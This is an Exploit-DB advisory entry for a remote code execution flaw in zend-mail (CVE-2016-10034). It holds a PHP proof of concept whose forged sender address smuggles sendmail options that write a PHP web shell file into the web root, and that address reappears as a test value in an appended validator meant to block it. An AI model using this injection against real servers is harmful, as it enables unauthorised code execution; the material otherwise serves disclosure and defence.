Zend Framework / zend-mail < 2.4.11 - Remote Code Execution

ID EDB-ID:40979
Type exploitdb
Reporter Exploit-DB
Modified 2016-12-30T00:00:00


Zend Framework / zend-mail < 2.4.11 - Remote Code Execution. CVE-2016-10034. Webapps exploit for PHP platform

Zend Framework < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11
zend-mail < 2.7.2
Discovered/Coded by:
Dawid Golunski
Full Advisory URL:


A simple PoC (working on the Sendmail MTA).
It injects the following parameters into the sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]

which writes the sendmail transfer log (-X) into the file /var/www/cache/phpcode.php.
Note that /var/www/cache must be writable by the www-data web user.

The resulting file will contain the payload passed in the body of the message:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
See the full advisory URL for the exploit details.
<?php
// Attacker's input coming from an untrusted source such as $_GET, $_POST etc.
// For example from a contact form with a sender field
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// base64-encoded phpinfo() PHP code, becomes the message body
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");

// ------------------
// mail() param injection via the vulnerability in zend-mail

// Bootstrap the ZF2 autoloader so the Zend\Mail classes resolve
include 'vendor/Zend/Loader/AutoloaderFactory.php';
Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' => array(
                'autoregister_zf' => true
        )
));

Zend\Mvc\Application::init(require 'config/application.php')->run();

$message        = new \Zend\Mail\Message();

// The tainted From address ends up as the -f parameter of the sendmail command
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');

$transport  = new \Zend\Mail\Transport\Sendmail();
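A defensive counterpart to the PoC above, added here as an example and not taken from the advisory or from zend-mail: a conservative check that refuses any sender address that could carry extra sendmail options once it is interpolated after -f by mail(). The function names isSafeSenderAddress and buildEnvelopeSenderParam and all sample addresses other than the advisory's injection string are constructed for this example.

```php
<?php
// Added example, not code from the advisory or from zend-mail.
// mail()'s 5th argument reaches the shell, so a sender address used in
// "-f<address>" must never contain characters that let the shell or
// sendmail's option parser see a second argument.

/**
 * Returns true only for a plain local@domain address that is safe to
 * interpolate after "-f". Quoted local parts are refused on purpose:
 * RFC 5322 allows them, but they are exactly what the injection abuses.
 */
function isSafeSenderAddress(string $email): bool
{
    // Whitespace, quotes, backslashes and control bytes can split the
    // command line (the advisory's payload relies on space, \" and ").
    if (preg_match('/[\s"\'\\\\\x00-\x1f\x7f]/', $email)) {
        return false;
    }
    // A leading "-" would itself be read by sendmail as an option.
    if ($email === '' || $email[0] === '-') {
        return false;
    }
    // Conservative dot-atom form: a strict subset of RFC 5322.
    return preg_match('/^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$/', $email) === 1;
}

/**
 * Builds the extra-parameter string for mail(), throwing instead of
 * passing a tainted address through to the command line.
 */
function buildEnvelopeSenderParam(string $email): string
{
    if (!isSafeSenderAddress($email)) {
        throw new InvalidArgumentException('Unsafe envelope sender rejected');
    }
    return '-f' . $email;
}

// Constructed samples; the second one is the advisory's injection string.
$samples = [
    'alice@example.com',
    '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com',
    '-fattacker@example.com',
    "bob@example.com\n-X/tmp/log",
];
foreach ($samples as $sample) {
    try {
        printf("accepted: %s\n", buildEnvelopeSenderParam($sample));
    } catch (InvalidArgumentException $e) {
        printf("rejected: %s\n", json_encode($sample));
    }
}
```

Only the first sample is accepted; the other three are refused before any string is handed to mail(), which is the check the vulnerable transport lacked.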